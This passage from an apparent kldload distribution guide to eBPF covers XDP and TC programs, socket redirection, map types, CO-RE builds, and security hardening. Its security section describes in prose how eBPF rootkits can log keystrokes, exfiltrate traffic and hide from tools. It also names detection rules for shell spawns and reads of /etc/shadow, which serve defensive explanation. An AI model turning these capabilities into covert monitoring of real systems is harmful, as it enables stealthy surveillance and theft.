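# Key bytes are 192.168.1.5 in network byte order (matching ip->saddr); value 01 = blocked.
bpftool map update pinned /sys/fs/bpf/blocklist \
    key hex c0 a8 01 05 \
    value hex 01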

# Remove a program:
ip link set dev eth0 xdp off
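
The key bytes passed to bpftool have to match ip->saddr exactly as it sits in packet memory, which is network byte order. As a small user-space sketch of how a feeder tool might derive those bytes, the helpers below (ipv4_to_map_key and format_bpftool_key are hypothetical names, not part of bpftool or libbpf) convert a dotted-quad string into the four key bytes and print them in the form the `key hex` argument expects.

```c
#include <arpa/inet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Convert dotted-quad text into the 4 key bytes that the XDP program
 * compares against ip->saddr. Returns 0 on success, -1 on invalid input. */
static int ipv4_to_map_key(const char *text, uint8_t key[4])
{
    struct in_addr addr;

    if (inet_pton(AF_INET, text, &addr) != 1)
        return -1;
    /* in_addr is already in network byte order; copy the bytes as stored. */
    memcpy(key, &addr.s_addr, 4);
    return 0;
}

/* Render the key as space-separated hex, e.g. for "bpftool ... key hex". */
static void format_bpftool_key(const uint8_t key[4], char out[12])
{
    snprintf(out, 12, "%02x %02x %02x %02x", key[0], key[1], key[2], key[3]);
}
```

Because inet_pton already returns network byte order, no byte swapping is needed on either little-endian or big-endian hosts.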

Concrete program: XDP load balancer (REDIRECT to backend)

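// Minimal XDP load balancer: hash src IP to one of N backends
// Full implementation needs MAC rewrite + ARP handling; this shows the structure
#include <linux/bpf.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

#define MAX_BACKENDS 8

struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, MAX_BACKENDS);   // up to 8 backends
    __type(key, __u32);
    __type(value, __u32);                // backend interface ifindex
} backends SEC(".maps");

SEC("xdp")
int xdp_lb(struct xdp_md *ctx) {
    void *data     = (void *)(long)ctx->data;
    void *data_end = (void *)(long)ctx->data_end;

    struct ethhdr *eth = data;
    if ((void *)(eth + 1) > data_end) return XDP_PASS;
    if (eth->h_proto != bpf_htons(ETH_P_IP)) return XDP_PASS;   // IPv4 only

    struct iphdr *ip = (void *)(eth + 1);
    if ((void *)(ip + 1) > data_end) return XDP_PASS;

    __u32 backend_idx = bpf_ntohl(ip->saddr) % MAX_BACKENDS;
    __u32 *ifindex = bpf_map_lookup_elem(&backends, &backend_idx);
    if (!ifindex || *ifindex == 0) return XDP_PASS;   // slot not configured

    return bpf_redirect(*ifindex, 0);
}

char _license[] SEC("license") = "GPL";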
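
Both XDP programs above follow the same discipline: check that a header fits inside the packet before reading any field from it, and bail out on anything that is not IPv4. The user-space sketch below shows that pattern on a plain byte buffer so it can be exercised without loading anything into the kernel. The function name parse_ipv4_saddr and the constants are assumptions for illustration; it uses a length instead of the data/data_end pointer pair, and it ignores VLAN tags and IP options.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ETH_HDR_LEN     14      /* dst MAC (6) + src MAC (6) + EtherType (2) */
#define IPV4_MIN_HDR    20      /* IPv4 header without options */
#define ETHERTYPE_IPV4  0x0800

/* Extract the IPv4 source address (network byte order) from a raw frame.
 * Returns 0 on success, -1 if the frame is too short or is not IPv4. */
static int parse_ipv4_saddr(const uint8_t *data, size_t len, uint8_t saddr[4])
{
    /* Bounds check before touching the Ethernet header. */
    if (len < ETH_HDR_LEN)
        return -1;

    uint16_t ethertype = (uint16_t)((data[12] << 8) | data[13]);
    if (ethertype != ETHERTYPE_IPV4)
        return -1;

    /* Bounds check before touching the IPv4 header. */
    if (len < ETH_HDR_LEN + IPV4_MIN_HDR)
        return -1;

    /* Source address sits 12 bytes into the IPv4 header. */
    memcpy(saddr, data + ETH_HDR_LEN + 12, 4);
    return 0;
}
```

In the kernel the verifier enforces these checks: a program that reads a header field without first comparing against data_end is rejected at load time.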

Performance numbers: On a single core, XDP_DROP can achieve 10–14 million packets per second on a 10G NIC with native XDP driver support. An XDP load balancer with REDIRECT runs at 6–8 Mpps. Compare to iptables DROP at roughly 1–1.5 Mpps. Under a volumetric DDoS, this difference determines whether your server falls over or keeps serving legitimate traffic.

XDP runs before the kernel allocates an sk_buff: before memory allocation, before routing lookup, before conntrack. This is why it is roughly 10x faster than iptables for packet filtering. On a kldload server under DDoS, an XDP program can drop millions of attack packets per second while legitimate traffic flows through the normal stack untouched. The blocklist update is a map write from userland: each entry is updated atomically and is visible to the XDP program on its next lookup. You can block a new attack source in microseconds, without reloading the program, without touching iptables, without a service restart. A production DDoS mitigation system built on XDP looks like this: a threat intelligence feed populates the blocklist map; the XDP program drops those packets at the NIC; everything else reaches the application. The entire mitigation path is a single hash table lookup per packet.

7. TC — Programmable Per-Packet Policy

TC (Traffic Control) eBPF programs attach to the Linux traffic control subsystem — the same qdisc layer that tc uses for bandwidth shaping and QoS. Unlike XDP, TC programs run after sk_buff allocation, which means they have access to the full packet metadata: socket information, routing decisions, conntrack state, cgroup membership, security identities. This makes TC the right choice for policy enforcement that needs context XDP cannot provide.

TC vs XDP: when to use which

Use XDP when you need maximum performance and the decision can be made from raw packet bytes alone — DDoS mitigation, simple stateless filtering, hardware offload. Use TC when you need socket context, routing info, cgroup membership, or conntrack state — policy enforcement, traffic accounting, marking packets with metadata for downstream processing.

// XDP: fastest, no sk_buff, limited context, ingress only (mostly)
// TC: slightly slower, full sk_buff, all context, ingress AND egress
// Cilium uses TC for most of its pod datapath: needs cgroup + identity context

Attaching TC programs

TC eBPF programs attach to a qdisc's ingress or egress hook using tc filter add. The clsact qdisc must be created first — it provides a direct-action hook that lets the eBPF program return a verdict without a separate classifier. Load with tc qdisc add dev eth0 clsact, then tc filter add dev eth0 ingress bpf da obj prog.o sec classifier.

// tc qdisc add dev eth0 clsact
// tc filter add dev eth0 ingress bpf da obj prog.o sec classifier
// tc filter add dev eth0 egress bpf da obj prog.o sec classifier
// tc filter show dev eth0 ingress

Concrete program: per-source-IP packet counter

// tc_counter.c: count packets per source IP, readable from userland
#include <linux/bpf.h>
#include <linux/pkt_cls.h>
#include <linux/if_ether.h>
#include <linux/ip.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

struct pkt_count {
    __u64 packets;
    __u64 bytes;
};

struct {
    __uint(type, BPF_MAP_TYPE_LRU_HASH);
    __uint(max_entries, 65536);
    __type(key, __u32);               // source IP
    __type(value, struct pkt_count);
} ip_counts SEC(".maps");

SEC("classifier")
int tc_ingress(struct __sk_buff *skb) {
    void *data     = (void *)(long)skb->data;
    void *data_end = (void *)(long)skb->data_end;

    // Only count IPv4; other EtherTypes pass through untouched
    if (skb->protocol != bpf_htons(ETH_P_IP)) return TC_ACT_OK;

    struct iphdr *ip = data + sizeof(struct ethhdr);   // skip Ethernet header
    if ((void *)(ip + 1) > data_end) return TC_ACT_OK;

    struct pkt_count *cnt = bpf_map_lookup_elem(&ip_counts, &ip->saddr);
    if (cnt) {
        // Atomic adds: the same entry can be updated from several CPUs at once
        __sync_fetch_and_add(&cnt->packets, 1);
        __sync_fetch_and_add(&cnt->bytes, skb->len);
    } else {
        struct pkt_count new = { .packets = 1, .bytes = skb->len };
        bpf_map_update_elem(&ip_counts, &ip->saddr, &new, BPF_ANY);
    }
    return TC_ACT_OK;              // pass the packet through
}

char _license[] SEC("license") = "GPL";
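
# Read the map from userland after some traffic
# (assumes ip_counts has been pinned at /sys/fs/bpf/ip_counts):
bpftool map dump pinned /sys/fs/bpf/ip_counts
# key: c0 a8 01 05  (192.168.1.5 in network byte order)
# value: packets=18423  bytes=27634500  (illustrative; exact output format depends on bpftool and BTF)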

Traffic marking and classification

TC programs can set skb->mark or skb->priority for downstream processing by the normal qdisc tree. This is how you build eBPF-aware QoS: classify traffic in eBPF (full context, arbitrary logic), record the result in skb->mark or skb->priority, and let the standard HTB or FQ_CoDel qdisc do the actual shaping. The eBPF program handles the classification logic; the existing TC infrastructure handles the queue management.

Cilium uses TC programs for all its pod-level policy enforcement. When a CiliumNetworkPolicy says "deny traffic from namespace X to namespace Y," that becomes a TC eBPF program attached to the pod's veth interface. The policy runs in the kernel on every packet — no userland, no context switch, no rule table walk. When you add a new policy, Cilium generates new eBPF bytecode, loads it, and atomically replaces the old program on the interface. The changeover is instantaneous and lossless — in-flight packets on the old program complete, new packets see the new program. No iptables flap, no conntrack flush, no packet loss window. This is what "kernel-native policy" means in practice.

8. Socket-Level eBPF — Application-Layer Interception

Socket-level eBPF programs operate at the socket layer — above the network stack but below the application. They can intercept socket operations, redirect data between sockets, and modify socket behavior without any changes to the application. The three relevant program types are sockops, sk_msg, and sk_lookup.

sockops — socket lifecycle events

Fires on socket state transitions: BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB (connection established), BPF_SOCK_OPS_PASSIVE_ESTABLISHED_CB (accepted connection established), BPF_SOCK_OPS_STATE_CB (any state change). Can call bpf_sock_ops_cb_flags_set() to request additional callbacks, and bpf_setsockopt() to configure socket options like TCP congestion control or buffer sizes.

// Cilium uses sockops to detect when two pods on the same node connect
// On ACTIVE_ESTABLISHED: check if destination is a local socket
// If yes: install sk_msg redirect, bypassing the network stack

sk_msg — message-level redirection

Fires on every message sent through a socket that is enrolled in a BPF_MAP_TYPE_SOCKMAP or SOCKHASH. Can redirect the message to a different socket in the same map using bpf_msg_redirect_map(). The data moves from the sender's socket straight to the receiver's socket inside the kernel, with no traversal of the TCP/IP stack or the virtual devices in between.

// Normal same-node pod communication:
//   pod-A socket → veth → bridge → veth → pod-B socket
// With sk_msg redirect:
//   pod-A socket → pod-B socket (direct kernel copy, no network stack)

sk_lookup — socket selection

Fires when the kernel looks up which socket should receive an incoming packet. The default behavior is to match destination IP and port. sk_lookup can override this — redirect to a different socket regardless of the destination port, implement wildcard listeners, or distribute traffic across multiple sockets. Used for transparent proxy implementations and advanced load balancing.

// Normal: incoming packet → look up socket by dst IP:port
// sk_lookup override: route based on arbitrary logic
// Use case: a proxy that handles all traffic to a VIP, regardless of port

The performance implication is significant. Normal pod-to-pod communication on the same node traverses: socket send buffer, TCP stack, veth pair (virtual Ethernet), bridge (with MAC lookup), routing table, conntrack, TCP stack again, socket receive buffer. With socket-level eBPF redirection, the path is: socket send buffer, kernel copy, socket receive buffer. The entire network stack is bypassed. Cilium's per-node measurements show 40–60% reduction in latency for same-node pod communication, and 2–3x throughput improvement for high-bandwidth workloads.

When two pods on the same node talk to each other, the packet normally goes through the veth pair, the bridge, the routing table, and conntrack. Socket-level eBPF short-circuits all of that — the packet goes directly from one socket to the other. Zero network stack traversal. This is how Cilium accelerates same-node pod communication. The key insight is that all this routing overhead exists because the kernel does not know both sockets are on the same machine — it processes the packet as if it might need to go anywhere. sockops lets Cilium tell the kernel "these two sockets are co-located; skip the routing." This is not a special optimization for containers. It is a general mechanism: any application that creates two sockets and wants to transfer data between them efficiently can use sockmap redirect. Memcached, Redis, Kafka, gRPC — all of these involve intra-host socket communication that could benefit from sk_msg redirection.

9. eBPF Maps Deep Dive

Maps are the data layer of eBPF. Every interesting eBPF application uses maps extensively — for state, for communication with userland, for configuration, for metrics. Choosing the right map type for your use case matters for performance and correctness.

BPF_MAP_TYPE_HASH

General-purpose hash map. O(1) average lookup. Key and value are fixed-size byte arrays. Supports concurrent access from multiple CPUs (with a spinlock per bucket). bpf_map_lookup_elem, bpf_map_update_elem, bpf_map_delete_elem. Good for: connection tracking, per-IP counters, blocklists with arbitrary keys.

// Key: source IP (u32) or 5-tuple struct
// Value: counter struct, connection state, policy verdict
// When to use: general key-value, key is not a small integer

BPF_MAP_TYPE_ARRAY

Fixed-size array indexed by u32. O(1) lookup by array index — slightly faster than hash for integer keys. Values are zero-initialized. Cannot delete entries. Good for: configuration (indexed by config enum), per-CPU statistics (use PERCPU_ARRAY for lock-free updates), global state with a small known key space.

// Key: u32 index (0 to max_entries-1)
// Value: config value, counter, backend struct
// When to use: small fixed key space, config tables, per-CPU stats

BPF_MAP_TYPE_LRU_HASH

LRU hash map — when the map is full, the least-recently-used entry is evicted. Bounded memory, self-managing. Essential for tracking ephemeral state (TCP connections, DNS queries) where you do not want to manage eviction yourself. Cilium uses LRU maps for its connection tracking tables.

// Like HASH but with automatic eviction when full
// Perfect for: connection tables, rate limit state, session tracking
// Size your max_entries for expected peak connections, not forever

BPF_MAP_TYPE_PERCPU_HASH / PERCPU_ARRAY

Per-CPU variants of hash and array. Each CPU core has its own copy of the value. eBPF programs access their CPU's copy without locks — zero contention. Userland reads all CPU copies and sums/aggregates them. Best for high-frequency counters (packet counts, byte counts) where lock contention on a shared counter would be the bottleneck.

// 8 CPUs → 8 independent counter copies
// eBPF: no lock, direct memory write, maximum throughput
// Userland: read all 8, sum them (slight overhead, but trivial)
// Use this for any high-frequency counter
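
As a rough illustration of the userland half of this pattern, the sketch below folds per-CPU slots into one total. The struct pkt_count layout and the sum_percpu name are assumptions made for the example. With libbpf, a lookup on a per-CPU map fills a buffer holding one value per possible CPU, and a loader would hand that buffer to a function like this one.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of the value stored in each per-CPU slot. */
struct pkt_count {
    uint64_t packets;
    uint64_t bytes;
};

/* Sum the per-CPU copies into a single total.
 * slots points at ncpus consecutive values, one per CPU. */
static struct pkt_count sum_percpu(const struct pkt_count *slots, size_t ncpus)
{
    struct pkt_count total = { 0, 0 };

    for (size_t i = 0; i < ncpus; i++) {
        total.packets += slots[i].packets;
        total.bytes   += slots[i].bytes;
    }
    return total;
}
```

The total is only a snapshot: CPUs keep counting while userland reads, which is acceptable for dashboards and rate calculations.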

BPF_MAP_TYPE_RINGBUF

Ring buffer for streaming events from eBPF programs to userland. Replaces the older BPF_MAP_TYPE_PERF_EVENT_ARRAY (which required per-CPU buffers). Single ring buffer, shared across CPUs, with ordering guarantees. bpf_ringbuf_output() copies event data to the ring. Userland polls with epoll and reads events via ring_buffer__poll() (libbpf API). Low-overhead, high-throughput event streaming.

// eBPF: bpf_ringbuf_output(&rb, &event, sizeof(event), 0)
// Userland: ring_buffer__poll(rb, 100)   // 100ms timeout
// Use for: audit events, security alerts, flow records, any event stream

BPF_MAP_TYPE_LPM_TRIE

Longest-prefix-match trie — the data structure used in IP routing tables. Key is a prefix (network address + prefix length). Lookup finds the most specific matching prefix. Perfect for: IP blocklists with CIDR ranges, routing policy tables, geo-blocking by prefix block.

// Insert: 192.168.0.0/16 → block=1
// Lookup: 192.168.1.5 → matches /16 → block=1
// Lookup: 10.0.0.1 → no match → lookup returns NULL (treat as not blocked)
// Use for any IP-prefix-based policy: faster than iterating all CIDRs
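
To make the lookup semantics concrete, here is a user-space sketch of longest-prefix matching. It is not how the kernel stores the trie: it uses a linear scan as a stand-in, and the names lpm_v4_key, lpm_entry, prefix_matches and lpm_lookup are hypothetical. The key layout (a 32-bit prefix length followed by the address bytes in network order) mirrors the shape of an LPM trie key for IPv4.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical IPv4 key: prefix length followed by address bytes. */
struct lpm_v4_key {
    uint32_t prefixlen;   /* number of significant leading bits (0..32) */
    uint8_t  data[4];     /* address bytes in network order */
};

struct lpm_entry {
    struct lpm_v4_key key;
    uint8_t value;
};

/* Return 1 if the first prefixlen bits of addr equal the prefix. */
static int prefix_matches(const struct lpm_v4_key *p, const uint8_t addr[4])
{
    uint32_t bits = p->prefixlen;

    for (size_t i = 0; i < 4 && bits > 0; i++) {
        uint8_t mask = bits >= 8 ? 0xff : (uint8_t)(0xff << (8 - bits));
        if ((p->data[i] & mask) != (addr[i] & mask))
            return 0;
        bits = bits >= 8 ? bits - 8 : 0;
    }
    return 1;
}

/* Linear-scan stand-in for the trie: most specific match, or NULL. */
static const struct lpm_entry *lpm_lookup(const struct lpm_entry *tbl,
                                          size_t n, const uint8_t addr[4])
{
    const struct lpm_entry *best = NULL;

    for (size_t i = 0; i < n; i++) {
        if (tbl[i].key.prefixlen > 32)
            continue;   /* ignore malformed entries */
        if (!prefix_matches(&tbl[i].key, addr))
            continue;
        if (!best || tbl[i].key.prefixlen > best->key.prefixlen)
            best = &tbl[i];
    }
    return best;
}
```

With both 192.168.0.0/16 and 192.168.1.0/24 in the table, an address in the /24 gets the /24 entry's value, and an address elsewhere in the /16 falls back to the /16 entry.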

Reading maps from userland with bpftool

bpftool is the Swiss Army knife for eBPF inspection. It can list all loaded programs, dump map contents, show BTF type information, and pin/unpin maps to the BPF filesystem. You do not need source code to inspect a running Cilium or Falco installation — bpftool reads their maps directly.

bpftool prog list                               # show all loaded eBPF programs
bpftool map list                                # show all maps
bpftool map dump id 42                          # dump all entries in map 42
bpftool map lookup id 42 key hex c0 a8 01 05    # lookup one key
bpftool map pin id 42 /sys/fs/bpf/mymap         # pin for later access

Concrete: rate limiter map

A per-IP rate limiter uses a hash map with a per-IP token bucket. The eBPF program checks the bucket on each packet, refills based on elapsed time (using bpf_ktime_get_ns()), and returns DROP or PASS. Userland can set per-IP rate limits by updating the map. No kernel module, no iptables hashlimit, no userland daemon in the packet path.

// Map: src_ip → { tokens, last_refill_ns }
// On each packet:
//   refill = (now - last_refill_ns) * rate     // rate expressed in tokens per nanosecond
//   tokens = min(tokens + refill, burst)
//   if tokens >= 1: tokens -= 1; return PASS
//   else: return DROP
// Entire rate limiter: a few dozen eBPF instructions per packet
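
The token-bucket arithmetic can be tried out in user space before it goes anywhere near the kernel. The sketch below is one possible integer-only version, under these assumptions: the names bucket and bucket_allow are hypothetical, the rate is given in packets per second, and now_ns stands in for the value bpf_ktime_get_ns() would return. It is an illustration of the refill logic, not a drop-in eBPF program.

```c
#include <stdint.h>

#define NSEC_PER_SEC 1000000000ULL

/* Hypothetical per-IP state, matching { tokens, last_refill_ns } above. */
struct bucket {
    uint64_t tokens;          /* whole packets currently allowed */
    uint64_t last_refill_ns;  /* time up to which tokens were credited */
};

/* Returns 1 to pass the packet, 0 to drop it. */
static int bucket_allow(struct bucket *b, uint64_t now_ns,
                        uint64_t rate_pps, uint64_t burst)
{
    if (rate_pps == 0)
        return 0;   /* a zero rate means "always drop" in this sketch */

    uint64_t elapsed = now_ns - b->last_refill_ns;
    /* Time needed to fill an empty bucket; longer gaps add nothing more. */
    uint64_t full_ns = burst * NSEC_PER_SEC / rate_pps;

    if (elapsed >= full_ns) {
        b->tokens = burst;
        b->last_refill_ns = now_ns;
    } else {
        uint64_t refill = elapsed * rate_pps / NSEC_PER_SEC;
        if (refill > 0) {
            uint64_t t = b->tokens + refill;
            b->tokens = t > burst ? burst : t;
            /* Advance only by the time actually converted into tokens,
             * so the fractional remainder is not lost. */
            b->last_refill_ns += refill * NSEC_PER_SEC / rate_pps;
        }
    }

    if (b->tokens == 0)
        return 0;
    b->tokens--;
    return 1;
}
```

Capping the elapsed time at full_ns keeps the multiplication from overflowing after a long idle period, which matters because an eBPF version would use the same 64-bit arithmetic.
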
Maps are the bridge between kernel speed and human readability. The eBPF program updates counters and state at wire speed — millions of operations per second, no syscalls, no context switches. Your monitoring dashboard reads the map from userland every second, aggregates the counters, and displays them. No packet copies, no pcap files, no log parsing, no ring buffer overflows at high traffic rates. The per-CPU map pattern is important: a single shared counter for packet counts would be a cache line that every CPU is fighting over. A per-CPU array means each CPU writes its own cache line — no contention at any packet rate. The userland aggregation cost is negligible. This pattern — per-CPU fast path, aggregated slow path — is how every high-performance eBPF counter should work.

10. Writing Production eBPF Programs

Early eBPF programs were tied to a specific kernel version. You compiled against kernel headers from one specific kernel build, and the program broke if the kernel was updated because internal struct layouts changed. CO-RE (Compile Once — Run Everywhere) changed this. Combined with BTF, CO-RE programs compile once and adapt themselves to whatever kernel they load on.

BTF — BPF Type Format

BTF is a compact binary format that encodes the type information (struct layouts, function signatures, enum values) of every kernel type. It is stored in /sys/kernel/btf/vmlinux on BTF-enabled kernels. Every kldload kernel has BTF enabled. When an eBPF program uses CO-RE relocations, the loader (libbpf) reads the kernel's BTF at load time and patches the program's field offsets to match the running kernel's actual struct layout. If a struct field moved between kernel versions, libbpf fixes it up before loading.

CO-RE in practice

Instead of task->mm->pgd (a brittle direct field access), a CO-RE program uses BPF_CORE_READ(task, mm, pgd). This macro generates a relocation record in the eBPF object. When libbpf loads the program, it looks up the mm and pgd field offsets in the running kernel's BTF and patches the field access to use the correct offset. The same binary runs on kernel 5.14, 6.0, 6.8 without recompilation.

// Non-portable (brittle):
task->mm->pgd                     // compiled-in offset, breaks on kernel update
// CO-RE (portable):
BPF_CORE_READ(task, mm, pgd)      // offset resolved at load time from BTF
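
The idea behind a CO-RE relocation can be shown with a user-space analogy. In the sketch below, two made-up struct layouts play the role of two kernel versions, a small table plays the role of BTF, and the read goes through an offset looked up at run time instead of one baked in at compile time. Every name here (task_v1, task_v2, btf_info, read_start_time) is hypothetical; libbpf's real mechanism patches instructions in the eBPF object and is considerably more involved.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Two hypothetical "kernel versions" of the same struct: the field moved. */
struct task_v1 {
    uint32_t pid;
    uint64_t start_time;
};

struct task_v2 {
    uint32_t pid;
    uint32_t flags;
    uint64_t cookie;
    uint64_t start_time;
};

/* Stand-in for BTF: where start_time lives on the running "kernel". */
struct btf_info {
    size_t start_time_off;
};

/* Stand-in for a relocated field access: read via the resolved offset. */
static uint64_t read_start_time(const void *task, const struct btf_info *btf)
{
    uint64_t v;

    memcpy(&v, (const uint8_t *)task + btf->start_time_off, sizeof(v));
    return v;
}
```

The reader function is compiled once and works against either layout, as long as it is given the offset that matches the struct it is actually looking at. That is the role the kernel's BTF plays for libbpf at load time.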

vmlinux.h — the kernel header replacement

Normally you include <linux/sched.h> and 50 other kernel headers. With BTF, you can generate a single vmlinux.h that contains all kernel type definitions, extracted directly from the running kernel's BTF. This eliminates the kernel headers dependency entirely. Generate it with: bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h. Include it in your eBPF C program. Done.

// Old way: #include <linux/sched.h>, <linux/mm.h>, ... (many headers)
// CO-RE way: #include "vmlinux.h" (single file, all types, from running kernel)
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

The skeleton pattern

libbpf provides a skeleton generator that makes it easy to load and manage eBPF programs from a C or C++ loader. The workflow: write the eBPF C program, compile it to an object file, generate a skeleton header with bpftool gen skeleton, include the skeleton in your loader. The skeleton handles: opening the object, loading the program (at which point the kernel verifier checks it), attaching it to the right hook, exposing maps as named struct members, and cleaning up on exit.

# 1. Write your eBPF C program: counter.bpf.c
# 2. Compile to eBPF object:
clang -O2 -g -target bpf -D__TARGET_ARCH_x86 \
    -I/usr/include/$(uname -m)-linux-gnu \
    -c counter.bpf.c -o counter.bpf.o

# 3. Generate skeleton header:
bpftool gen skeleton counter.bpf.o > counter.skel.h

# 4. In your C loader, include counter.skel.h and use the generated API:
#   struct counter_bpf *skel = counter_bpf__open_and_load();
#   counter_bpf__attach(skel);
#   // access maps: skel->maps.ip_counts
#   counter_bpf__destroy(skel);
# (Go loaders use the cilium/ebpf library and its own code generator instead.)

For Go programs, the cilium/ebpf library provides the same skeleton pattern through its Go code generator, bpf2go. For Rust, aya is the idiomatic choice with native Rust eBPF programs and a Rust loader. For Python, BCC's Python bindings provide a higher-level interface (used by the Python-based bcc tools).

Early eBPF programs were tied to a specific kernel version. If you shipped an eBPF binary and the user updated their kernel, the binary broke — field offsets changed, struct layouts shifted, new fields were added. CO-RE plus BTF changed that. You compile once, ship a binary, and libbpf adapts the program to whatever kernel it finds. kldload ships BTF-enabled kernels across all supported distros — CentOS Stream 9 (5.14+), Debian 13 (6.1+), Ubuntu 24.04 (6.8+). CO-RE programs work out of the box on any kldload target. This is the same foundation that Cilium and Falco use to ship a single binary that works across kernel versions. For anyone writing operational tooling in Go or Rust that needs kernel visibility — network monitoring, security auditing, performance profiling — the cilium/ebpf or aya libraries with CO-RE are the right foundation. You get kernel-speed instrumentation with the portability of a normal binary.

11. eBPF Security Considerations

eBPF is simultaneously the best security monitoring tool available for Linux and a meaningful attack surface if access is not controlled. Understanding both sides is essential.

What eBPF can see

An eBPF program with the right program type can observe everything that passes through the kernel: every syscall with its arguments and return values, every network packet with full payload access (at TC level), every file open, read, and write, every process exec with its argument list, every memory allocation, every inter-process signal. A malicious eBPF program could log every keystroke (intercept read() on terminal file descriptors), exfiltrate every network payload (TC program), or silently drop connections (XDP program). This is not hypothetical — rootkits built on eBPF exist and are used in the wild.

CAP_BPF and CAP_PERFMON

Linux 5.8 split the previous requirement for CAP_SYS_ADMIN to load eBPF programs into finer-grained capabilities. CAP_BPF allows loading eBPF programs and creating maps. CAP_PERFMON allows attaching to performance events and tracepoints. Networking program types such as XDP and TC additionally require CAP_NET_ADMIN. Together, these allow running observability tools without full root, but any of them on a compromised process is still very powerful. On kldload, only root can load eBPF programs by default.

// Privileged eBPF (CAP_BPF + CAP_PERFMON): full tracing, networking
// Unprivileged BPF: disabled on kldload (kernel.unprivileged_bpf_disabled=1)
// Check: sysctl kernel.unprivileged_bpf_disabled (should be 1)

eBPF for security monitoring: Falco

Falco uses an eBPF probe (or kernel module) to capture syscall events and evaluate rules against them. The rules are things like: "a process in a container spawned a shell," "a process opened /etc/shadow," "a binary wrote to /usr/bin." The eBPF probe captures events at kernel speed; Falco evaluates rules in userland. The combination gives you real-time security alerting with minimal overhead.

// Rough bpftrace one-liner equivalent of Falco's core behavior:
bpftrace -e 'tracepoint:syscalls:sys_enter_execve /comm != "bash"/ { printf("EXEC: pid=%d comm=%s file=%s\n", pid, comm, str(args->filename)); }'

Tetragon — kernel-enforced security policy

Tetragon, a Cilium project, goes further than Falco: it can enforce policy in the kernel, not just observe it. A Tetragon TracingPolicy can attach a SIGKILL action to a specific syscall pattern, so the eBPF program sends the signal before the syscall completes. No userland round-trip, no race condition. If a process tries to exec a binary outside an allowed set, the kernel kills it before it runs.

// Falco: observe event → userland rule → alert (100ms reaction time)
// Tetragon: observe event → kernel policy → SIGKILL (microseconds)
// The difference matters for exploits that complete in milliseconds

kldload default security posture

kldload sets kernel.unprivileged_bpf_disabled=1 — unprivileged users cannot load eBPF programs or create maps. bcc tools and bpftrace require root. eBPF programs loaded by Cilium run as root under the Cilium agent's service account. The BPF filesystem (/sys/fs/bpf/) is accessible to root only. These defaults mean an attacker who does not have root cannot deploy a stealthy eBPF rootkit.

sysctl kernel.unprivileged_bpf_disabled=1   # set at boot
# Also verify: ls -la /sys/fs/bpf/ → owned by root, mode 700
# And: bpftool prog list requires root
# And: bpftrace requires root
eBPF is both the best security monitoring tool and a potential security risk. A malicious eBPF program can log every keystroke, every network connection, every file access — in the kernel, invisible to userland tools like ps, netstat, and lsof. This is why CAP_BPF exists and why only root should load eBPF programs. On kldload, the default security posture is: only root loads eBPF, bcc and bpftrace require root, and unprivileged BPF is disabled. If you are running a multi-tenant system where untrusted code runs, verify these settings are enforced. The good news: if you are already using eBPF for security monitoring (Falco, Tetragon), you have visibility into any attempt to load additional eBPF programs — Tetragon can alert on bpf(BPF_PROG_LOAD) syscalls from unexpected processes. Fighting eBPF with eBPF, from a position of first-mover advantage.

12. The kldload eBPF Toolkit

kldload is the only Linux distribution that ships eBPF development tools, runtime libraries, and a BTF-enabled kernel as a unified pre-configured stack on a bootable ISO. The live environment and every installed target system (desktop and server profiles) include:

Component | What it is | Covered in
bcc-tools | 80+ production-ready eBPF programs for networking, disk, CPU, memory | Section 4
bpftrace | One-liner eBPF tracing language: awk for the kernel | Section 5
bpftool | Low-level eBPF inspection: programs, maps, BTF, skeleton generation | Sections 9, 10
kernel headers | Required for compiling eBPF programs against kernel types | Section 3
libbpf | C library for loading eBPF programs, managing maps, CO-RE support | Section 10
BTF support (/sys/kernel/btf/vmlinux) | Enables CO-RE: compile-once eBPF programs that work across kernel versions | Section 10
Kernel 5.14+ / 6.1+ | All modern eBPF features: bounded loops, ring buffer, BTF, CO-RE, sockmap | Section 3

The complete picture: a kldload server is an eBPF-native host. The kernel ships with BTF enabled, so CO-RE programs from Cilium, Falco, and Tetragon work out of the box. bcc-tools and bpftrace are installed, so any operational question can be answered from the command line in seconds. libbpf and kernel headers are installed, so you can write and compile new eBPF programs on the host without a separate development environment. bpftool is installed, so you can inspect any running eBPF program or map — whether it was loaded by Cilium, a bcc tool, or your own code — without source access.

eBPF changes the economics of kernel observability. Questions that previously required days of strace analysis, packet captures, and log correlation now take seconds — one bpftrace one-liner, one bcc tool invocation. Security monitoring that previously required expensive APM agents or kernel modules now runs as lightweight eBPF programs with sub-1% CPU overhead at production traffic rates. Network policy that previously required complex iptables rule management now lives in kernel-compiled eBPF programs that update atomically and perform at line rate. On kldload, all of this is available the moment the OS boots.

Related pages